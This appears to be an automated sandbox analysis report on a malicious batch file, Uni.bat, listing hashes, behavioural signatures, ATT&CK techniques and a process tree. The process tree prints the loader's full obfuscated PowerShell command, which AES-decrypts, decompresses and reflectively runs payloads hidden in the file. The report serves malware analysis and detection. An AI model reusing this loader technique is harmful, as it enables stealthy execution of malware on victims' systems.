45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

Analysis

max time kernel
46s
max time network
16s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
14-05-2024 23:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

515KB
MD5

4c2a3be3d5c9464eb441677e41f44fd8
SHA1

c826034a0882d21a39056d745e88622ee9698343
SHA256

45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512

ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
SSDEEP

12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2180 powershell.exe
Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

2180 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2180 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2180 powershell.exe

pid	process
2180	powershell.exe

pid	process
2180	powershell.exe

pid	process
2180	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2180	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

cmd.exenet.exe

description	pid	process	target process
PID 2140 wrote to memory of 1960	2140	cmd.exe	net.exe
PID 2140 wrote to memory of 1960	2140	cmd.exe	net.exe
PID 2140 wrote to memory of 1960	2140	cmd.exe	net.exe
PID 1960 wrote to memory of 1928	1960	net.exe	net1.exe
PID 1960 wrote to memory of 1928	1960	net.exe	net1.exe
PID 1960 wrote to memory of 1928	1960	net.exe	net1.exe
PID 2140 wrote to memory of 2180	2140	cmd.exe	powershell.exe
PID 2140 wrote to memory of 2180	2140	cmd.exe	powershell.exe
PID 2140 wrote to memory of 2180	2140	cmd.exe	powershell.exe
PID 2140 wrote to memory of 2180	2140	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2140

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:1928

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2180-2-0x0000000073A61000-0x0000000073A62000-memory.dmp

Filesize
4KB

Download
memory/2180-3-0x0000000073A60000-0x000000007400B000-memory.dmp

Filesize
5.7MB

Download
memory/2180-4-0x0000000073A60000-0x000000007400B000-memory.dmp

Filesize
5.7MB

Download
memory/2180-6-0x0000000073A60000-0x000000007400B000-memory.dmp

Filesize
5.7MB

Download
memory/2180-5-0x0000000073A60000-0x000000007400B000-memory.dmp

Filesize
5.7MB

Download
memory/2180-7-0x0000000073A60000-0x000000007400B000-memory.dmp

Filesize
5.7MB

Download